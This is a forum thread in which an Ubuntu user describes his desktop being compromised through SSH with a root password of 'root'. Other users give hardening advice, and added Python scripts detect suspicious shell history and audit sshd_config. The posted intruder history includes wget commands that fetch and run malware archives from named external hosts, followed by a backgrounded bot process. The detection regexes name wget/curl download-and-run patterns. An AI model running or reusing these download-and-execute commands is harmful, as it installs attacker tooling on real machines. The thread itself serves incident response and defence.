Arrggh my Ubuntu Desktop got hacked

Other Pineapple Smurf (Honorary Master; joined Jun 21, 2008; 14,593 messages)
Yes, it happened, but before the Windowze fanboiz start throwing insults :D it was a security oversight on my side.

I set up my router to port forward my dyndns account to my desktop via ssh. Then I left my root password as "root" :whistling:

Ooopppss

Picked up the hack after I noticed my CPU was going ape and ./pscan2 was running (?). I try to run "last" and get a rather odd error msg: log file is missing. Oh no, I'z beenz hackedz.

Tried to su to root and it did not understand the password. So I quickly ran "sudo passwd root" (I'm a sudo fan) and the world is a happy place after a reboot.

Lesson learnt.
 

Other Pineapple Smurf (Honorary Master; joined Jun 21, 2008; 14,593 messages)
Checked my history and this is what the guy did:

passwd
w
ps x
wget
eth0
ifconfig
screen
w
cat /proc/cpuinfo
wget http://freewebs.com/blacksnakee/unixcod.tar.gz
tar zxvf unixcod.tar.gz
cd unixcod
./unix 41.242
./unix 41.243
./unix 41.244
./unix 41.246
./unix 41.247
cd ..
ifconfig
ls
ifconfig eth0 up 41.240.9.189
wget http://gblteam.webs.com/gosh.tgz.tar
tar -zxvf gosh.tgz.tar
cd gosh
./go.sh 84
cd
ls
rm -rf gosh gosh.tgz.tar
wget http://microcad.org/.hack/emech.zip
unzip emech.zip
cd emech
chmod +x *
./bash
cd
ls
w
wget http://tengere.webs.com/bnc/flegma.tgz
tar zxvf flegma.tgz
cd flegma
nohup ./start 51 >> /dev/null &
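As an added, defender-side example (not code from anyone in this thread), a small Python triage script that scans a shell-history dump for the sequence visible above: reconnaissance commands, a remote download, archive extraction, running a binary out of the unpacked directory, an interface reconfiguration and a detached background process. The sample history is constructed and the download host is a placeholder.

```python
"""Triage a shell-history dump for the download-extract-run pattern seen in the thread."""
import re

# Constructed sample, modelled on (not copied from) the history posted above;
# malware.example is a placeholder host.
SAMPLE_HISTORY = """\
w
ps x
cat /proc/cpuinfo
wget http://malware.example/unixcod.tar.gz
tar zxvf unixcod.tar.gz
cd unixcod
./unix 41.242
cd ..
ifconfig eth0 up 41.240.9.189
nohup ./start 51 >> /dev/null &
ls
"""

# Each rule is (tag, compiled regex) applied to the stripped command line.
RULES = [
    ("recon", re.compile(r"^(w|ps x|cat /proc/cpuinfo|ifconfig)$")),
    ("remote_download", re.compile(r"^(wget|curl)\s+\S*://")),
    ("archive_extract", re.compile(r"^(tar\s+-?z?x\S*|unzip)\b")),
    ("run_from_cwd", re.compile(r"^(nohup\s+)?\./\S+")),      # ./binary, possibly via nohup
    ("iface_reconfig", re.compile(r"^ifconfig\s+\S+\s+up\b")),  # address change on an interface
    ("background_detach", re.compile(r"^nohup\b.*&$")),         # survives logout, output discarded
]


def triage_history(text):
    """Return a list of (line_number, tag, command) for every rule that matches a line."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        cmd = raw.strip()
        for tag, rx in RULES:
            if rx.search(cmd):
                findings.append((n, tag, cmd))
    return findings


def download_then_run(findings):
    """True if a remote download, an extraction and a ./binary execution occur in that order."""
    wanted = ["remote_download", "archive_extract", "run_from_cwd"]
    i = 0
    for _, tag, _ in findings:
        if i < len(wanted) and tag == wanted[i]:
            i += 1
    return i == len(wanted)


if __name__ == "__main__":
    hits = triage_history(SAMPLE_HISTORY)
    for n, tag, cmd in hits:
        print(f"{n:3d} {tag:17s} {cmd}")
    print("download -> extract -> run chain present:", download_then_run(hits))
```

As koffiejunkie notes further down, a history file on a rooted box is only a starting point for triage, not evidence you can trust.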
 

koffiejunkie (Executive Member; joined Aug 23, 2004; 9,588 messages)
Let this be a lesson! Format and re-install. Once someone has got root on your box, you cannot trust any logs or shell history. And if you really need ssh to be open from outside, put ssh on a random port and disable root login in /etc/ssh/sshd_config:

Code:
# non-default listening port
Port 10852
# refuse direct root logins over ssh
PermitRootLogin no

Replace 10852 with a number between 1024 and 65535
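To check that the advice above actually took effect, here is an added Python example (not koffiejunkie's code) that parses sshd_config text and flags a port outside the suggested range, PermitRootLogin yes, and the absence of an AllowUsers/AllowGroups restriction. Both configuration samples are constructed and the account name "alice" is a placeholder.

```python
"""Audit sshd_config text for the weak settings discussed in this thread."""
import re

# Constructed sample: default port and direct root login permitted.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
"""

# Constructed sample: non-default port, root login disabled, logins limited
# to one account ("alice" is a placeholder).
HARDENED_CONFIG = """\
Port 10852
PermitRootLogin no
AllowUsers alice
"""


def parse_sshd_config(text):
    """Return {keyword_lowercased: value} for the global directives in the text.

    Keywords are case-insensitive and, as in sshd, the first value given for a
    keyword wins. Comment and blank lines are skipped; Match blocks are not
    handled, so this checks the global settings only.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means every check passed."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg.get("permitrootlogin", "").lower() == "yes":
        findings.append("PermitRootLogin yes: root can log in directly over ssh")
    port = cfg.get("port", "22")  # sshd listens on 22 when no Port line is present
    if not (port.isdigit() and 1024 <= int(port) <= 65535):
        findings.append(f"Port {port}: not in the 1024-65535 range suggested above")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("no AllowUsers/AllowGroups: any local account can log in over ssh")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(text) or ["ok"])
```

Run it against the real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())` after editing, and remember that sshd must be restarted before a changed Port or PermitRootLogin applies.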
 

Tinuva (The Magician; joined Feb 10, 2005; 12,475 messages)
Also a good idea: install fail2ban once you do have a good password on. At least the guy gets automatically banned in iptables after 3 wrong passwords, making brute-force attacks almost useless.
 

FacELesS. (Well-Known Member; joined May 9, 2005; 185 messages)
Anyone had a look at those files he downloaded?
I noticed many password lists, IP lists and some IRC stuff, but it would be interesting if someone can explain what some of the other things do.
 

koffiejunkie (Executive Member; joined Aug 23, 2004; 9,588 messages)
> Anyone had a look at those files he downloaded?
> I noticed many password lists, IP lists and some IRC stuff, but it would be interesting if someone can explain what some of the other things do.

I have (I always do when I encounter a compromised box). Will look at it tonight, but I can tell you from experience, the intended use would have been one of the following:

1. launching ssh or pop3 brute force attacks against other hosts
2. sending spam
3. taking part in a DDOS
4. botnet control
 
Fudzy (Guest)
What sort of barriers are in place to stop noobs/DFUs from doing the same thing?
 

MyWorld (Executive Member; joined Mar 24, 2004; 5,001 messages)
> There is no patch for stupidity. ;)
HAHAHAHAHAHA
Made my day there koffiejunkie!

Hang on, I thought Ubuntu WAS the patch?
/me takes a cheap shot at everyone not using distro X

Replace X with preferred distro, obviously anything goes except Ubuntu.

Years ago with ISDN and using a normal cheap PII as a firewall and router we used to post our IPTables and auth logs on IRC to see who was trying to hack who. Was quite fun to see them try and fail. Of course with ISDN you only had connectivity for a night (7-7) so any attempt (even with a weak password) was utterly useless.
Back then the attempts numbered in the hundreds over a single night. Since I quit IRC and most online chat services that number has dropped considerably.
 

Veroland (Executive Member; joined Aug 24, 2005; 6,304 messages)
So, I guess you won't want to give us your IP and path net to netcat by any chance ;)
 

Other Pineapple Smurf (Honorary Master; joined Jun 21, 2008; 14,593 messages)
Yup, I make serious facepalm.

Box has been compromised and I have no idea what has been done to it. Most likely a backdoor has been created. Solution is to re-install; that's our policy at the office.

Going to set a different port for ssh too, and also will not allow root login and will limit remote login to a specific user.
 

The_Unbeliever (Honorary Master; joined Apr 19, 2005; 103,196 messages)
If it was a whinydoze box, you wouldn't have known about the hack.

It is easier hacking Windows than any kind of Linux/Unix box with proper security.
 

The_Unbeliever (Honorary Master; joined Apr 19, 2005; 103,196 messages)
> Box has been compromised and I have no idea what has been done to it. Most likely a backdoor has been created. Solution is to re-install; that's our policy at the office.

Yes, that'll be the safest thing to do.

Lesson learnt. Now life can go on.
 

cpu. (Executive Member; joined Jun 23, 2010; 5,420 messages)
Now I know why I can't delete my terminal history with history -c anymore. Probably explains why the OP still had that.

I cancelled my Dyndns.org usage after 2 days. My router security log was going crazy. At least all my passwords are configured and root login disallowed. ;)
 